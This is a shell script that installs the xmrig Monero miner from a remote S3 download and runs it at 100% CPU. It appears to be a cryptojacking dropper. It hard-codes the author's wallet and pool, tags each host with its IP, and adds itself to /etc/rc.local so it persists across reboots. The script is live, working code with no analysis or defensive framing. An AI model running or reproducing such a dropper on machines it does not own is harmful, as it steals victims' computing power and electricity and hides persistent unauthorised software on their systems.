#!/bin/sh
#Author Anonymouse
#Killer_Clowns!

MY_WALLET="46Nz5YXtu37bmUWE1QV98ZXWuZa5oaP2xCBLxeZnRWysej7KKnNbTB3JmoViFbyKVK8hZyzXNNj5nfe4pffm36k2DmfQzQ1"
MY_WALLET_PASS="tatapogi"
CPU_USAGE="100"

# DON'T EDIT BELOW THIS LINE
ALGO="cryptonight"
POOL_URL_AND_PORT="192.110.160.114:80"
IP=$(ip route get 8.8.8.8| grep src| sed 's/.*src \(.*\)$/\1/g')
CONFIG_NAME="config.json"

#install libraries
add-apt-repository -y ppa:jonathonf/gcc-7.1
apt-get update
apt-get install -y libmicrohttpd-dev

# Install xmrig binary
cd /tmp
wget http://mymonero.s3-ap-southeast-1.amazonaws.com/xmrig.tar.bz2 -O xmrig.tar.bz2
tar -vxjf xmrig.tar.bz2
cp -f xmrig /usr/local/bin/xmrig
chmod +x /usr/local/bin/xmrig
rm -f xmrig.tar.bz2
rm xmrig

cd /etc
wget http://mymonero.s3-ap-southeast-1.amazonaws.com/config.v1.json -O ${CONFIG_NAME}
sed -i "s/ALGO/${ALGO}/g" ${CONFIG_NAME}
sed -i "s/POOL_URL_AND_PORT/${POOL_URL_AND_PORT}/g" ${CONFIG_NAME}
sed -i "s/WALLET_ADDRESS/${MY_WALLET}/g" ${CONFIG_NAME}
sed -i "s/WALLET_PASS/${MY_WALLET_PASS}-${IP}/g" ${CONFIG_NAME}
sed -i "s/CPU_USAGE/${CPU_USAGE}/g" ${CONFIG_NAME}

/usr/local/bin/xmrig -c /etc/config.json

# Insert to startup script
sed -i -e '$i \/usr/local/bin/xmrig -c /etc/config.json\n' /etc/rc.local
